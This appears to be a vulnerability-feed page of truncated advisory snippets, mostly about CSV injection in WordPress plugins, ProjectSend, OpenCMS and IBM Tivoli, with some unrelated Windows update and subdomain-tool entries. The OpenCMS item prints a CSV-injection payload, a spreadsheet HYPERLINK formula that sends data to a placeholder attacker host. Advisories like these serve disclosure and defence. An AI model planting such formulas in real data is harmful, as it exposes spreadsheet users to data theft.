CVE-2019-11872

The Hustle aka wordpress-popup plugin 6.0.7 for WordPress is vulnerable to CSV Injection as it allows for injecting malicious code into a pop-up window. Successful exploitation grants an attacker with a right to execute malicious code on the administrator's computer through Excel functions as the...

TableField - Moderately critical - Access bypass and Cross Site Scripting - SA-CONTRIB-2019-051

This module allows you to attach tabular data to an entity. Access bypass There's no access check for users with an "Export Tablefield Data as CSV". They can export data from unpublished nodes or otherwise inaccessible entities. This vulnerability is mitigated by the fact that an attacker must ha...

Hustle <= 6.0.7 - Unauthenticated CSV Injection

The Hustle – Email Marketing, Lead Generation, Optins, Popups WordPress plugin was affected by an Unauthenticated CSV Injection security vulnerability...

CVE-2018-7201

CSV Injection was discovered in ProjectSend before r1053, affecting victims who import the data into Microsoft Excel...

Input validation

CSV Injection was discovered in ProjectSend before r1053, affecting victims who import the data into Microsoft Excel...

CVE-2018-7201

CSV Injection was discovered in ProjectSend before r1053, affecting victims who import the data into Microsoft Excel...

CVE-2018-7201

CSV Injection was discovered in ProjectSend before r1053, affecting victims who import the data into Microsoft Excel...

CVE-2018-7201

CVE-2018-7201 corresponds to a CSV Injection vulnerability in ProjectSend prior to version r1053. The issue arises when exporting/loading data for use in Microsoft Excel, enabling injection via CSV fields. Affected product: ProjectSend (before r1053). Root cause details are described only as a CS...

ProjectSend CVS Injection Vulnerability

rojectSend formerly known as cFTP is a suite of self-hosted applications based on PHP and MySQL. A CVS injection vulnerability exists in versions prior to ProjectSend r1053 that affects victims who import data into Microsoft Excel...

May 19, 2019—KB4505051 (OS Build 10240.18218)

May 19, 2019—KB4505051 OS Build 10240.18218 Improvements and fixes This update includes quality improvements. Key changes include: Addresses an issue that may prevent access to some gov.uk websites that don’t support HTTP Strict Transport Security HSTS when using Internet Explorer 11 or Microsoft...

May 19, 2019—KB4505062 (OS Build 16299.1150)

May 19, 2019—KB4505062 OS Build 16299.1150 Reminder: March 12th and April 9th will be the last two Delta updates for Windows 10, version 1709. Security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please...

WordPress FV Flowplayer Video Player plugin <= 7.3.14.727 - CSV Export vulnerability

CSV Export vulnerability found in WordPress FV Flowplayer Video Player plugin versions = 7.3.14.727. Solution Update the WordPress FV Flowplayer Video Player plugin to the latest available version at least 7.3.15.727...

FV Flowplayer Video Player <= 7.3.14.727 - CSV Export

Changelog states: Security - fix for email subscription CSV export capability available to guest users...

May 14, 2019—KB4499165 (Security-only update)

May 14, 2019—KB4499165 Security-only update Improvements and fixes This security update includes quality improvements. Key changes include: Provides protections against a new subclass of speculative execution side-channel vulnerabilities, known as Microarchitectural Data Sampling , for 64-Bit x64...

May 14, 2019—KB4499158 (Security-only update)

May 14, 2019—KB4499158 Security-only update Improvements and fixes This security update includes quality improvements. Key changes include: Provides protections against a new subclass of speculative execution side-channel vulnerabilities, known as Microarchitectural Data Sampling , for 64-Bit x64...

RSMembership! older than 1.22.11 ,Other

RSMembership! older than 1.22.11,Other UpdateNotice URL https://www.rsjoomla.com/blog/view/468-csv-vulnerability-explained.html...

RSEvents! Pro (March 2019),Other

RSEvents! Pro March 2019,Other new version number 2.2.1 UpdateNotice URL https://www.rsjoomla.com/blog/view/468-csv-vulnerability-explained.html...

Findomain - A Cross-Platform Tool That Use Certificate Transparency Logs To Find Subdomains

A cross-platform tool that use Certificates Transparency logs to find subdomains. We currently support Linux, Windows and MacOS. How it works? It tool doesn't use the common methods for subdomains discover, the tool uses Certificate Transparency logs to find subdomains and it method make it tool...

OpenCMS 10.5.4 CSV Injection

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...

CVE-2019-4071

IBM Tivoli Storage Productivity Center IBM Spectrum Control Standard Edition 5.2.1 through 5.2.17 could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 157063...